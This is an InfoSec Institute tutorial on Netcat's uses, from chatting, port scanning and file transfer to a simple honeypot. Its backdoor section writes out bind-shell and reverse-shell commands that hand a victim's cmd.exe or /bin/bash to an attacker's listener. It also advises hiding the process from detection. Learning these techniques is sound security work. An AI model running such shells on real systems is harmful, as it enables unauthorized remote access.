Hacking

Netcat: TCP/IP Swiss Army Knife

Sudhanshu Chauhan
December 12, 2012 by
Sudhanshu Chauhan

Most of the tools in any hacker or pentester's arsenal are task-specific; they specialize in one function only but Netcat, also known as the 'TCP/IP Swiss Army Knife,' does not fall into this category. Netcat is a tool capable of writing data across a network using TCP or UDP protocol but this simple capability allows it to perform many functionalities. Its capability to create almost any kind of connection makes it a simple and efficient network debugging and exploration tool. It has been built in such a manner that it can act as a client as well as a server, which elevates its utility to a higher level.

Netcat provides the following functionalities that can be useful for a hacker/pentester or a network admin:

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.
  • Chatting
  • Port Scanning
  • Banner Grabbing
  • Port Redirection/Proxying
  • File Transfer
  • Honeypot
  • RAT/Backdoor

Before describing Netcat functionalities in detail, some terms need to be explained briefly:

Port Scanning: The act of systematically scanning a host for open ports. Once determined, these open ports can be utilized to gain access to the host or to launch an attack.

Banner Grabbing: A fingerprinting technique aimed at extract information about a host such as operating system, web server, applications etc. A simple form of banner grabbing is to send a request and analyze the response received.

Port Redirection: A simple technique used to transfer traffic from one port to another. It is utilized to access services which are restricted in any specific environment.

Honeypot: A Honeypot is a monitored decoy used to attract attackers away from critical resources and also a tool to analyze an attacker's methods and characteristics. It can emulate various services provided by an OS and also generate responses for those services. It provides an environment which is capable of interacting with an attacker and monitors his/her activities without any real resources at risk.

First of all let's see all the options provided by Netcat:

root@bt:~# nc -h

[v1.10-38]

connect to somewhere: nc [-options] hostname port[s] [ports] ...

listen for inbound: nc -l -p port [-options] [hostname] [port]

options:

-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]

-e filename program to exec after connect [dangerous!!]

-b allow broadcasts

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h this cruft

-i secs delay interval for lines sent, ports scanned

-k set keepalive option on socket

-l listen mode, for inbound connects

-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-q secs quit after EOF on stdin and delay of secs

-s addr local source address

-T tos set Type Of Service

-t -t answer TELNET negotiation

-u UDP mode

-v -v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp-data').

Let's now dive into the details of Netcat as a tool.

Chatting: Netcat can be used for the purpose of chatting from one system to another. We need to configure Netcat to listen on a specific port at one machine and connect to that specific address (IP+port) from a remote Netcat instance as shown in figure 1.

Machine A root@bt:- # nc –l –p 123

Machine B C:> nc 192.168.118.130 123

[caption id="attachment_13248" align="alignnone" width="625"]Figure 1. Chatting using Netcat Figure 1. Chatting using Netcat[/caption]

Figure 1. Chatting using Netcat

Port Scanning: Although there are many sophisticated tools available for the purpose of port scanning a host such as Nmap and Scapy, Netcat can also be used for it. It does not provide a very detailed output and has no advanced feature such as OS fingerprinting, yet it is capable of detecting if a port is open or not. Netcat as a port scanner is demonstrated in figure 2.

Machine B C:> nc –v –w 2 –z 192.168.118.130 1-100

Figure 2. Port Scanning

Banner Grabbing: Extending this same feature, we can also perform banner grabbing. Figure 3 shows how we have extracted the web server header (Apache/2.2.14).

Machine B C:> nc –vv 192.168.118.130 80

Figure 3. Banner Grabbing

Port Forwarding: Sometimes, there are restrictions imposed on the ports that we can utilize for outgoing connections (eg. in the office). This is where Netcat's port redirection capability can be utilized. It allows listening on any specific port and redirecting that traffic to another port. So, on our home computer, we can listen on the port that is allowed in the restricted environment and forward it to the port we want to connect to. Now we simply need to connect to our home machine from that environment. The setup is displayed in the figure 4.

Machine A root@bt:- # nc –l –p 8008 –c "nc google.com 80"

Machine B Browse 192.168.118.130:8008

[caption id="attachment_13250" align="alignnone" width="650"]Figure 4. Port Forwarding Figure 4. Port Forwarding[/caption]

File Transfer: Extending it further, we can also transfer files using Netcat. For this, we need to set up Netcat on the receiving side in listen mode and forward any input received into a file, then on the sender's side, we need to make a connection to the specific address of the receiving side and send in the file as demonstrated in figure 5. Netcat does not provide any method to check that the file has been transferred completely, so we need to wait for some time based on the file size and the transfer rate and then terminate the connection.

Machine A root@bt:- # nc –lv -p 123 > test.txt

Machine B C:> nc 192.168.118.130 123 < test1.txt

Figure 5. File Transfer

Honeypot: Netcat can also be used to set up a very simple Honeypot. For this we need to set up Netcat in listen mode on a specific port and send a user-defined output to the incoming connection. It also allows us to see the traffic (probably an attack) received on the specific port. Figure 6 shows a simple Honeypot.

Machine A root@bt:- # nc –lvvp 443 < apache2.txt

Machine B C:> nc 192.168.118.130 443

[caption id="attachment_13256" align="alignnone" width="650"]Figure 6. Simple Honeypot Figure 6. Simple Honeypot[/caption]

Figure 6. Simple Honeypot

Backdoor: Netcat can also be utilized as a backdoor. To understand the working of Netcat as a backdoor, let's assume the following configuration:

Figure 7. Configuration Demonstration

Machine A is behind a NAT device and accesses the web using the private IP address provided by the NAT. The NAT device and B both have a public IP address as shown in figure 7.

Now there are two scenarios for this configuration:

I Bind Shell: In this scenario the attacker (A) needs to connect to the victim's machine (B) in the future, so after exploiting the victim's machine once, he/she has dropped a custom Netcat instance. On the victim's machine, the Netcat will be executed under listen mode at a specific port and the command is redirected to an exe (cmd.exe). Now the attacker can simply connect to it by providing the IP address and the port number and can execute commands on the victim. Figure 8 clearly demonstrates the scenario.

Machine B C:> nc –lvvp –e cmd.exe

Machine A root@bt:- # nc –v 192.168.118.1 1234

[caption id="attachment_13258" align="alignnone" width="625"]Figure 8. Bind Shell Figure 8. Bind Shell[/caption]

Figure 8. Bind Shell

II Reverse Shell: Now in this scenario the positions have been switched and the victim is behind a NAT device (A) and the attacker (B) needs to connect to him/her. So this time the attacker might utilize the feature of Netcat to transfer a command shell to a host listening for a connection. The Netcat instance at the victim's machine will connect to the attacker and pass its command shell to the attacker's machine listening for it as shown in figure 9.

Machine B C:> nc –lvvp 1234

Machine A root@bt:- # nc –v 192.168.118.1 1234 –e /bin/bash

[caption id="attachment_13260" align="alignnone" width="650"]Figure 9. Reverse Shell Figure 9. Reverse Shell[/caption]

Figure 9. Reverse Shell

While using Netcat as a backdoor, we need to keep in mind that if we use it as-it-is then it will prompt a command shell window on the victim's machine, so we need to make sure to hide it inside another process/executable or implement other techniques to make it undetectable.

So we have discussed some handy uses of Netcat, but these are not the only functionalities it provides. We can utilize this application to do much more by integrating it with other tools. Netcat is a very powerful tool but sometimes is flagged as malware by anti-virus distributions; hence, we should also discuss some Netcat alternatives which provide some additional functionality.

Cryptcat: Cryptcat is a Netcat clone with twofish encryption, so that the communication sent/received is encrypted. All of the other functions are the same as Netcat. Cryptcat can be downloaded from http://sourceforge.net/projects/cryptcat/files/.

SBD: Similar to Cryptcat, SBD is another Netcat clone with AES-CBC-128 + HMAC-SHA1 for the purpose of encryption.

Socat: Socat is similar to Netcat and supports different protocols. It can work through files, pipes, sockets, proxy, SSL etc.

Ncat: Ncat is an improved reimplementation of Netcat and comes along with the widely used port scanner Nmap. Apart from the usual options, it provides advanced features like IPv6 support, Ncat chaining, SCTP support, etc. Ncat provides support for SSL which enables the user to securely transfer files or to connect to SSL enabled services. Ncat also provides support for proxies (HTTP/SOCKS) and can itself act as a proxy. We can also define a blacklist of hosts that we do not want to connect to us using the 'deny' option. One other interesting feature provided by Ncat is the 'broker' feature, which allows multiple hosts to connect to a centralized Ncat server and communicate with each other. With all the new features, Ncat is a perfect replacement for Netcat. File transfer over SSL using Ncat is shown in the figure 10.

Machine A root@bt:- # Ncat –l –ssl 123 >Ncattest.txt

Machine B C:>Ncat 192.168.118.130 123 –ssl < test2.txt

[caption id="attachment_13261" align="alignnone" width="650"]Figure 10. Ncat File Transfer over SSL Figure 10. Ncat File Transfer over SSL[/caption]

Figure 10. Ncat File Transfer over SSL

Conclusion:

FREE role-guided training plans

FREE role-guided training plans

Get 12 cybersecurity training plans — one for each of the most common roles requested by employers.

There are many other sophisticated tools for every feature provided by Netcat, yet no other tool is powerful enough to provide so many functionalities in a single package. Netcat is not only useful for a pentester but it can also be utilized by system administrators for their daily activities. The simplicity of the usage and implementation provided by Netcat makes it one of the widely used tools in every pentester's arsenal.

Sudhanshu Chauhan
Sudhanshu Chauhan

Sudhanshu Chauhan is a researcher at InfoSec Institute. He is a B.Tech (CSE) graduate from Amity University. His areas of interest include (but are not limited to) Web Application Security and Bypasssing Security Measures(IDS/IPS, AV etc.).